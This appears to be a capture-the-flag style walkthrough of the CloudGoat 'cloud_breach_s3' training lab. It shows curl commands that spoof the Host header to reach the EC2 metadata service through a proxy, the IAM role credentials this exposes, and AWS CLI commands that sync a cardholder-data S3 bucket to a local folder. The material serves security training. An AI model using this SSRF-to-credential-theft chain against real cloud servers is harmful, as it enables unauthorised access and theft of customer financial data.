cloud_breach_s3

# Create Deploy
% ./cloudgoat.py create scenarios/cloud_breach_s3
% cat /home/hnl/Desktop/ctf/cloud-goat/cloudgoat/cloud_breach_s3_cgidgg194kst78/start.txt
cloudgoat_output_aws_account_id = 287336331436
cloudgoat_output_target_ec2_server_ip = 54.160.183.232

# Useful Link
https://pentestbook.six2dez.com/enumeration/cloud/aws#ec2-basic-commands

# Start
http://54.160.183.232/latest/meta-data -H 'Host:169.254.169.254'

% curl http://54.160.183.232/latest/meta-data
<h1>This server is configured to proxy requests to the EC2 metadata service. Please modify your request's 'host' header and try again.</h1>

% curl http://54.160.183.232/latest/meta-data -H 'Host:169.254.169.254'
ami-id
ami-launch-index
ami-manifest-path
block-device-mapping/
events/
hibernation/
hostname
iam/
identity-credentials/
instance-action
instance-id
instance-life-cycle
instance-type
local-hostname
local-ipv4
mac
metrics/
network/
placement/
profile
public-hostname
public-ipv4
public-keys/
reservation-id
security-groups
services/

% curl http://54.160.183.232/latest/meta-data/iam/ -H 'Host:169.254.169.254'
info
security-credentials/

% curl http://54.160.183.232/latest/meta-data/iam/security-credentials/ -H 'Host:169.254.169.254'
cg-banking-WAF-Role-cloud_breach_s3_cgidgg194kst78

% curl http://54.160.183.232/latest/meta-data/iam/security-credentials/cg-banking-WAF-Role-cloud_breach_s3_cgidgg194kst78 -H 'Host:169.254.169.254'
{
  "Code" : "Success",
  "LastUpdated" : "2021-09-10T03:10:55Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIAUFZUUPCWISZAVXI5",
  "SecretAccessKey" : "9AeYcJw5Qdt3T3WA6chKepbdhdq4nPdjfj+2NLbB",
  "Token" : "IQoJb3JpZ2luX2VjEIT//////////wEaCXVzLWVhc3QtMSJHMEUCIAds2lGMR7+9mnuKU4B0kwDiriMkkzNC3At+U1r357hzAiEAxd/PUnlkyyfM1YRSG7tdCsqQ7OvyLbPoUc7daynStz8qgwQIzP//////////ARACGgwyODczMzYzMzE0MzYiDI5dShBOMlhtCCTMoCrXA/21eQ3TXKTd+zhFhwuB+n2nbAomEJcCPTsCa/tNoSTolFz3jMS6qlEH8RKEUueJdBlwBaWigFRCS+l8mBPlVjziYMwZz85UDnQlQDYmlkOip+D4umFuHarSWUyYiYHginzgrwANU0NpzR/Ab8iWI7ggTbKIpbkBym9pIZ5jJtVN3Q2McDU7gNwdQeNgmwkHrLvUjODH+Y9JRV+Zizp75qrTwMCWfHmXZVy99/qW+9cnQ3MDNhaCSWt3r3omZ6cGNl1O3bKFCBaf/7+xtibeMzhhrkHsY7vvET6tl+yYWicnq1cAgWDB1ZxhCXOuLp5dUPY1uneiW6ThiI9N93Q1GAC4XZLSLxNJ6v8+jKUgpDOQFvQRZojfZLacXOu608fP60ZS7c1fL4IVdqx0lWRdSLmJCHpcHKWsKCyexS2c7CqbFNNKeWK7cZQRahJH8NQ0L7XGaQyhS9DDwj2k/dhTH+8LOpOaDmRB53SSJIHqwTuivpiBRfOwq3Ojr8E+9Roi8uumQ6A084G2/StRxRi8/HNoqz+2OpO/QN60a7adiCbd+6/GxNIvg3doZj0edNgyaEBJlPeKzjyW3rFW+ul4mX+OCkyFFEUJc1nPZ/brugBoiRLIHXCEXDDKmeuJBjqlAXYdYchvi1QX80m0SSr/0bVqNKQtCkQbBgiVoElEgzWE1Ux7Zmk85ZYEVYfIR/08aXOEDnL7gTyH1yyjGxbEVDqpNq39h9PGKbPjZcBG67HO2vAsr2sW3XtK6OauorrnjCANV6y4izuVClMnWwkH2GI+RwHXFR2qydjfiPHAEWMVfa6U0kKgyHUn1xlYNxcq8MCz6YH5uY6YbyoSpuRVN/s5I9dsBA==",
  "Expiration" : "2021-09-10T09:46:06Z"
}

% aws configure --profile user01
% aws s3 ls --profile user01
2021-09-10 09:40:14 cg-cardholder-data-bucket-cloud-breach-s3-cgidgg194kst78

% aws s3 sync --profile user01 s3://cg-cardholder-data-bucket-cloud-breach-s3-cgidgg194kst78 ../file
download: s3://cg-cardholder-data-bucket-cloud-breach-s3-cgidgg194kst78/cardholder_data_secondary.csv to ../file/cardholder_data_secondary.csv
download: s3://cg-cardholder-data-bucket-cloud-breach-s3-cgidgg194kst78/cardholder_data_primary.csv to ../file/cardholder_data_primary.csv
download: s3://cg-cardholder-data-bucket-cloud-breach-s3-cgidgg194kst78/goat.png to ../file/goat.png
download: s3://cg-cardholder-data-bucket-cloud-breach-s3-cgidgg194kst78/cardholders_corporate.csv to ../file/cardholders_corporate.csv

% ls ../file 
cardholder_data_primary.csv  cardholder_data_secondary.csv  cardholders_corporate.csv  goat.png

% ./cloudgoat.py destroy scenarios/cloud_breach_s3